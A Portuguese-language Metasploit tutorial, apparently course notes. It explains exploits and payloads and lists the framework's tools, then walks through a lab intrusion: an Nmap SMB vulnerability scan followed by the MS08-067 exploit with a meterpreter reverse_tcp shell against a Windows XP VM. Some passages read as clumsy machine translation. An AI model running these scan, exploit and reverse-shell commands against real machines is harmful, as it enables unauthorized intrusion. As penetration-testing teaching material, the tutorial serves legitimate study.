Metasploit Sabe o que é? é uma plataforma que permite a verificação do estado da segurança dos computadores existentes numa determinada rede, permitindo atacar as falhas de segurança existentes nos mais diversos softwares. Este é o melhor conjunto de ferramentas sendo atualizadas diariamente com as mais recentes falhas de segurança identificadas por profissionais no ramo.
Esta framework open source, em constante transformação, é programada em Ruby e está organizada em diversos módulos. São estes módulos que contêm os programas preparados especificamente para tirarem partido de vulnerabilidades encontradas nos softwares e sistemas operativos, permitindo assim a execução de código maligno e consequentemente a invasão da máquina.
A estes programas é dado o nome de exploits e ao código maligno é dado o nome de payload, sendo os exploits aqueles que atacam as falhas nos softwares e executam o payload, para no final desse processo devolver uma sessão remota de Telnet ou SSH permitindo assim o controlo remoto do computador atacado.
Esta ferramenta tem como missão criar um ambiente de pesquisa, desenvolvimento de exploração de vulnerabilidades permitindo descobrir erros de programação que levam a uma brecha na segurança. Também é usado este método para analizar preventivamente, colocando a vulnerabilidade em estudo determinando ou tentando determinar de que forma esta poderá ser explorada.
Depois de enquadrado todo o cenário possível usando a vulnerabilidade parte-se para o desenvolvimento do próprio exploit, onde são aplicadas várias técnicas de engenharia reversa, programação, etc. Por fim é executado o exploit testando o mesmo em vários cenários, tantos quantos possíveis e identificados na fase de exploração da vulnerabilidade. Fica desta forma provada a existência da vulnerabilidade após o sucesso a correr o exploit.
TECNICA DE UTILIZAÇÃO O metasploit possui várias ferramentas : msfconsole metasploit em modo console msfcli interface de automatização de penetração e exploração msflogdump exibe sessões de arquivos de log msfplayload usado para gerar payloads customizados msfpescan utilizado para analisar e descompilar executáveis e DLLs msfencode um codificador interactivo de payload encoder msfupdate utilizado para verificar e fazer download de actualização do framework msfweb Interface gráfica via browser
Executando comando no prompt da console A tela de MSFConsole aparecerá conforme imagem. Leve alguns momentos para explorar a tela de consolo digitando help ao msf>
Executando comando no prompt da console Dentro do msf>prompt, você pode listar os exploits disponíveis com o seguinte comando: show exploits.
Para informação sobre um comando em particular, você pode usar o comando de info. Você sempre poderá ter certeza do comando se for útil antes de você escutá-lo. Olhemos para informação disponível para o comando lsass_ms04_011. Digite info lsass_ms04_011.
Executando comando no prompt da console Ver os objetivos disponíveis, tipo, show targets, ao lembrete. Este comando devolve uma lista de objetivos disponíveis para este comando. Tipo show payloads Fixar o objetivo, tipo, set TARGET # (onde # indica o número do sistema operacional designado). fixar a carga útil, tipo, set PAYLOAD seguido pelo nome da carga útil que você deseja usar. Note, quando você fixou a carga útil, seu lembrete mudará Use set TARGET 2 e set PAYLOAD win32_bind. Você também pode usar set TARGET 0 para automaticamente fixado o objetivo para qualquer sistema operacional
Quando todos as variáveis foram fixos, você está agora pronto completar a façanha. Você pode fazer assim em um dos dois modos; usando o comando check o modo de cheque de vulnerabilidade é invocado, usando o comando exploit, a façanha selecionada é lançada de fato. (Nota: Em alguns módulos, o check característica não está disponível) Nós usaremos o comando de façanha para lançar a façanha.
Se o sistema designado for vulnerável, você será apresentado com uma interface de linha de comando interativa da máquina designada ou seja vc cairá no prompt de comando. Não desanime se você não conseguir! Isto só significa que a máquina que você está testando não é vulnerável ao ataque. Sinta livre para explorar outras façanhas, cargas úteis e opções. Esta é uma ferramenta temerosa para prova de penetração/invasão. Por que você pensa que o Projeto de Metasploit trouxe este programa disponível livre quando poderia ter cobrado por isto?. Carregue qualquer atualização ao Vigamento no local de Web de Metasploit (http://www.metasploit.org). Você também pode utilizar o MSFupdate incluída neste programa para fazer via Web automaticamente as atualizações.
Executando uma Intrusão no metasploit Para fazer uma intrusão com o Metasploit precisa-se de um programa para fazer escaneamento da rede para usaremos NMAP Usando 2 maquinas virtuais para fazer a intrusão Ambas com: Sistema Operacional Backtrack 4 Final com endereço IP 192.168.0.170. Sistema Operacional Windows XP SP2 com endereço IP 192.168.0.186.
Usando NMAP Abrindo o terminal com Backtrack Usando o comando # nmap -v --script=smb-check-vulns 192.168.0.0/24 -v = Modo Verbose --script=smb-check-vulns = Script para verificar vulnerabilidades conhecidas, como por exemplo, MS08-067, Conficker, regsvc DoS e SMBv2 exploit. 192.168.0.0/24 = Range de IP utilizado em minha rede local.
host com endereço IP 192.168.0.186, são mostradas portas que estão abertas em MS08-067 está como VULNERABLE, odne pode ser atacado
Utilizando msfconsole Abrindo o metasploit Utilizando os seguintes comandos exploit/windows/smb/ms08_067_netapi #comando para usar o exploit ms08_067_netapi set RHOST 192.168.0.186 #setando o host remoto, que no caso é o endereço IP da VM com Windows XP SP2 set PAYLOAD windows/meterpreter/reverse_tcp #especificando o payload que iremos utilizar, reverse_tcp, ele é o responsável por criar a nossa comunicação entre LHOST e RHOST. set LHOST 192.168.0.170 #setando o host local, que no caso é o endereço IP da VM com Backtrack 4. exploit #executando o exploit.
Dentro da Maquina para testar que está dentro da maquina, utilizando sysinfo e ipconfig